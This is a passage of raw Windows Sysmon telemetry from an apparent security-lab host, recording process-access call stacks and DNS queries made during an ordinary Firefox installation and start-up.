Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.770{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a80098|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.770{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a80098|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.770{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a80098|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.280{59A5CD1D-8E56-6005-2E00-00000000A301}246434.183.230.54.in-addr.arpa.0type: 12 server-54-230-183-34.ham50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.276{59A5CD1D-8E56-6005-2E00-00000000A301}246435.194.224.13.in-addr.arpa.0type: 12 server-13-224-194-35.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.232{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.229{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.com044.236.72.93;44.235.246.155;44.236.48.31;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.229{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.com0::ffff:44.236.48.31;::ffff:44.236.72.93;::ffff:44.235.246.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.183{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.firefox.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.180{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.firefox.com035.155.76.53;44.240.166.47;52.40.168.255;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.179{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.firefox.com0::ffff:52.40.168.255;::ffff:35.155.76.53;::ffff:44.240.166.47;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.130{59A5CD1D-945A-6005-3305-00000000A301}7052pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.128{59A5CD1D-945A-6005-3305-00000000A301}7052pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com044.240.93.245;52.34.114.142;52.35.6.89;52.35.83.137;52.39.144.189;54.191.136.131;35.161.157.118;44.239.250.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.127{59A5CD1D-945A-6005-3305-00000000A301}7052incoming.telemetry.mozilla.org0type: 5 telemetry-incoming.r53-2.services.mozilla.com;type: 5 pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com;::ffff:44.239.250.14;::ffff:44.240.93.245;::ffff:52.34.114.142;::ffff:52.35.6.89;::ffff:52.35.83.137;::ffff:52.39.144.189;::ffff:54.191.136.131;::ffff:35.161.157.118;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.935{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org.cdn.cloudflare.net02606:4700::6812:a422;2606:4700::6812:a522;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.931{59A5CD1D-945A-6005-3305-00000000A301}7052ipv4only.arpa0::ffff:192.0.0.171;::ffff:192.0.0.170;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.930{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org.cdn.cloudflare.net0104.18.164.34;104.18.165.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.929{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org0type: 5 www.mozilla.org.cdn.cloudflare.net;::ffff:104.18.165.34;::ffff:104.18.164.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.929{59A5CD1D-945A-6005-3305-00000000A301}7052example.org0::ffff:93.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.929{59A5CD1D-945A-6005-3305-00000000A301}7052example.org093.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.881{59A5CD1D-945A-6005-3305-00000000A301}7052prod.detectportal.prod.cloudops.mozgcp.net02600:1901:0:38d7::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.879{59A5CD1D-945A-6005-3305-00000000A301}7052prod.detectportal.prod.cloudops.mozgcp.net034.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.878{59A5CD1D-945A-6005-3305-00000000A301}7052detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;::ffff:34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.254{59A5CD1D-8E56-6005-2E00-00000000A301}2464141.48.215.34.in-addr.arpa.0type: 12 ec2-34-215-48-141.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000017044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.253{59A5CD1D-8E56-6005-2E00-00000000A301}246419.194.224.13.in-addr.arpa.0type: 12 server-13-224-194-19.fra2.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.570{59A5CD1D-945A-6005-3305-00000000A301}7052cs9.wac.phicdn.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.568{59A5CD1D-945A-6005-3305-00000000A301}7052cs9.wac.phicdn.net093.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.567{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.560{59A5CD1D-945A-6005-3305-00000000A301}7052prod-classifyclient.normandy.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.559{59A5CD1D-945A-6005-3305-00000000A301}7052prod-classifyclient.normandy.prod.cloudops.mozgcp.net034.98.75.36;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.558{59A5CD1D-945A-6005-3305-00000000A301}7052classify-client.services.mozilla.com0type: 5 prod-classifyclient.normandy.prod.cloudops.mozgcp.net;::ffff:34.98.75.36;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.544{59A5CD1D-945A-6005-3305-00000000A301}7052normandy-cdn.services.mozilla.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.543{59A5CD1D-945A-6005-3305-00000000A301}7052normandy-cdn.services.mozilla.com013.224.194.126;13.224.194.17;13.224.194.21;13.224.194.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.542{59A5CD1D-945A-6005-3305-00000000A301}7052normandy.cdn.mozilla.net0type: 5 normandy-cdn.services.mozilla.com;::ffff:13.224.194.35;::ffff:13.224.194.126;::ffff:13.224.194.17;::ffff:13.224.194.21;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.457{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:2057:7400:a:da5e:7900:93a1;2600:9000:2057:b000:a:da5e:7900:93a1;2600:9000:2057:c000:a:da5e:7900:93a1;2600:9000:2057:ee00:a:da5e:7900:93a1;2600:9000:2057:0:a:da5e:7900:93a1;2600:9000:2057:3a00:a:da5e:7900:93a1;2600:9000:2057:6200:a:da5e:7900:93a1;2600:9000:2057:6400:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.456{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net054.230.183.110;54.230.183.119;54.230.183.6;54.230.183.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.455{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:54.230.183.34;::ffff:54.230.183.110;::ffff:54.230.183.119;::ffff:54.230.183.6;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.419{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.418{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com013.224.194.20;13.224.194.89;13.224.194.121;13.224.194.19;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.411{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com0::ffff:13.224.194.19;::ffff:13.224.194.20;::ffff:13.224.194.89;::ffff:13.224.194.121;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.635{59A5CD1D-944E-6005-2205-00000000A301}6120download-stats.mozilla.org0type: 5 download-stats.r53-2.services.mozilla.com;::ffff:34.215.48.141;::ffff:52.40.50.138;C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe 10341000x800000000000000017027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.677{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39bf2|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.538{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.538{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla 